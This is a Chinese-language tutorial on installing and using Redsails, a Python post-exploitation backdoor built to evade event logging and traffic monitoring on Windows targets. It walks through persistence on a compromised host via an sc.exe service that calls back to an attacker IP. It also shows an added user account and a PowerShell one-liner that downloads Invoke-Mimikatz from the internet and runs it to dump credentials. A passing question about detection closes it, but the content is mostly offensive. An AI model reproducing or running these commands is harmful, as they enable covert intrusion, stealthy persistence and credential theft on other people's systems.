无痕后门——redsails使用小结

Redsails是使用python开发的一款后渗透测试工具

本文作者:i春秋签约作家——Sp4ce

> Redsails是使用python开发的一款后渗透测试工具,其目的是可以使我们在目标主机上执行命令且无需创建任何事件日志以及网络连接,详细作用如下:
> – 在目标主机持续建立连接
> – 绕过许多常见的事件日志
> – 产生虚假日志/网络流量


0×01安装依赖

redsails需要pydivert、pydivert、pycrypto,因此需要pip下【此步在windows下完成】

> pip install pydivert

1.png

 pip install pbkdf2

2.png

> easy_install pycrypto

在安装pycrpto之前需要VC++编译器点我下载

3.png

在没有python环境的windows下执行需要将其打包,因此还需要pyinstaller

> pip install pyinstaller

4.png

0×02环境介绍&配置&攻击

攻击机:Windows7、Kali Linux
windows7IP:10.53.3.102
Klilinux IP:10.53.3.104
靶机:Windows 2008 R2 DataCenter、Windows 2012R2【可在windows全平台运行】
IP:10.53.3.161、10.53.3.211
首先从gayhub上下载redsails并解压到桌面

5.png

pyinstaller-script.py -F --clean redSails.spec

6.png

7.png

8.png

9.png


> 长久控制【添加到服务】
> 【命令注释】
> ATTACKIP:攻击机IP,PORT:开放端口,PASSWORD:连接密码
> 肉鸡CMD下执行
> sc.exe create servername binpath= “cmd.exe /C FILEPATH/FILENAME -a ATTACKIP -o PORT -p PASSWORD
> 黑体部分按照上面说的自己替换


更多的东西自己挖掘吧

SHELL下的常用CMD命令
其实就是CMD命令前面加SHELL::
SHELL::whoami
SHELL::net user
SHELL::netstat -ano
SHELL::net user name password /add

powershell在这里也可以用
命令:PSHELL: :P
 OWERSHELL命令
查密码的命令:PSHELL::IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1 ');Invoke-Mimikatz

如果有无法生成的,可以用附件中的exe
文件信息
MD5: 3F985A55BEAAF1E11C87CDE1A34E49D6
SHA1: EE6A0458D9CCEE529CD75D89245B18057E20B291
CRC32: 99D4B13E
[hide]有后门[/hide]

0×03思考

> 如果后门可以躲避IDS等流量监控系统的审查,那么作为运维的我们该如何检测呢?

更多查看原文哦~

更多精彩
取消
Loading...

填写个人信息

姓名
电话
邮箱
公司
行业
职位
css.php